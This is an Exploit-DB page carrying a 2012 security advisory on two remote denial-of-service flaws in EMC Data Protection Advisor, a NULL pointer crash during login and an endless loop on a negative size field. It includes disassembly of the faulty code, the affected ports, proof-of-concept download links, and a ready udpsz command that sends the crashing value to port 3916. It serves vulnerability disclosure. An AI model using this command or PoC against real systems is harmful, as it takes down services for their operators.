EMC Data Protection Advisor 5.8.1 - Denial of Service

EDB-ID:

18688

CVE:

2012-0407 2012-0406

EDB Verified:

Author:

Luigi Auriemma

Type:

dos

Exploit:   /  

Platform:

Hardware

Date:

2012-03-31

Vulnerable App: 
#######################################################################

                             Luigi Auriemma

Application:  EMC Data Protection Advisor
              http://www.emc.com/backup-and-recovery/data-protection-advisor/data-protection-advisor.htm
Versions:     <= 5.8.1
Platforms:    AIX, HP-UX, Linux, Solaris, Windows
Bugs:         A] cProcessAuthenticationData NULL pointer
              B] thread CPU 100%
Exploitation: remote
Date:         29 Mar 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's homepage:
"EMC Data Protection Advisor: Manage service levels, reduce complexity,
and eliminate manual efforts with EMC’s powerful data protection
management software that automates monitoring, analysis, alerting, and
reporting across backup, replication, and virtual environments."


#######################################################################

=======
2) Bugs
=======

------------------------------------------
A] cProcessAuthenticationData NULL pointer
------------------------------------------

The missing password field or an empty password in the
AUTHENTICATECONNECTION command required to login leads to a NULL
pointer dereference in the DPA_Utilities.cProcessAuthenticationData
function:

  10042EA0  /$ 55             PUSH EBP
  10042EA1  |. 8BEC           MOV EBP,ESP
  10042EA3  |. 83EC 0C        SUB ESP,0C
  10042EA6  |. A1 B04F0C10    MOV EAX,DWORD PTR DS:[100C4FB0]
  10042EAB  |. 33C5           XOR EAX,EBP
  10042EAD  |. 8945 FC        MOV DWORD PTR SS:[EBP-4],EAX
  10042EB0  |. 53             PUSH EBX
  10042EB1  |. 56             PUSH ESI
  10042EB2  |. 8BF1           MOV ESI,ECX
  10042EB4  |. 57             PUSH EDI
  10042EB5  |. 56             PUSH ESI
  10042EB6  |. E8 93E3FBFF    CALL DPA_Util.decodeString
  10042EBB  |. 8BC8           MOV ECX,EAX
  10042EBD  |. 83C4 08        ADD ESP,8
  10042EC0  |. 8D59 01        LEA EBX,DWORD PTR DS:[ECX+1]
  10042EC3  |> 8A11           /MOV DL,BYTE PTR DS:[ECX]     ; strlen() NULL pointer
  10042EC5  |. 83C1 01        |ADD ECX,1
  10042EC8  |. 84D2           |TEST DL,DL
  10042ECA  |.^75 F7          \JNZ SHORT DPA_Util.10042EC3


------------------
B] thread CPU 100%
------------------

Endless loop in the DPA_Utilities library while handling the protocol
if it's used a negative 64bit size field:

  100138FC   > 3BF1           CMP ESI,ECX
  100138FE   . 75 0C          JNZ SHORT DPA_Util.1001390C
  10013900   . 8B55 E4        MOV EDX,DWORD PTR SS:[EBP-1C]
  10013903   . 0B55 E8        OR EDX,DWORD PTR SS:[EBP-18]
  10013906   . 0F84 C1020000  JE DPA_Util.10013BCD
  1001390C   > 2975 DC        SUB DWORD PTR SS:[EBP-24],ESI
  1001390F   . 68 20870910    PUSH DPA_Util.10098720        ; "nsReadRequest"
  ...
  100137F0   > 8B7D 08        MOV EDI,DWORD PTR SS:[EBP+8]
  100137F3   > 8B75 E4        MOV ESI,DWORD PTR SS:[EBP-1C]
  100137F6   > 837D E8 00     CMP DWORD PTR SS:[EBP-18],0   ; signed comparison
  100137FA   . 7F 4A          JG SHORT DPA_Util.10013846
  100137FC   . 7C 04          JL SHORT DPA_Util.10013802
  100137FE   . 85F6           TEST ESI,ESI
  10013800   . 77 44          JA SHORT DPA_Util.10013846
  10013802   > 837D E0 00     CMP DWORD PTR SS:[EBP-20],0   ; signed comparison
  10013806   . 0F8C 0B040000  JL DPA_Util.10013C17
  1001380C   . 7F 0A          JG SHORT DPA_Util.10013818
  1001380E   . 837D DC 00     CMP DWORD PTR SS:[EBP-24],0
  10013812   . 0F86 FF030000  JBE DPA_Util.10013C17
  10013818   > BF 1B700910    MOV EDI,DPA_Util.1009701B
  1001381D   . 33F6           XOR ESI,ESI
  1001381F   > 33C9           XOR ECX,ECX
  10013821   . 894D F4        MOV DWORD PTR SS:[EBP-C],ECX
  10013824   . 894D F0        MOV DWORD PTR SS:[EBP-10],ECX
  10013827   . 390B           CMP DWORD PTR DS:[EBX],ECX
  10013829   . 894D F8        MOV DWORD PTR SS:[EBP-8],ECX
  1001382C   . 894D EC        MOV DWORD PTR SS:[EBP-14],ECX
  1001382F   . 0F84 C7000000  JE DPA_Util.100138FC

Note that this loop doesn't affect the working of the other connections
to the affected service.


Both the bugs can be exploited in the following services:
- DPA_Controller on port 3916
- DPA_Listener   on port 4001


#######################################################################

===========
3) The Code
===========


A]
http://aluigi.org/poc/dpa_1.zip

  dpa_1 SERVER

B]
http://aluigi.org/testz/udpsz.zip

  udpsz -c "18446744073709551615/1/UNB" -T SERVER 3916 -1


#######################################################################

======
4) Fix
======


No fix.


#######################################################################
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services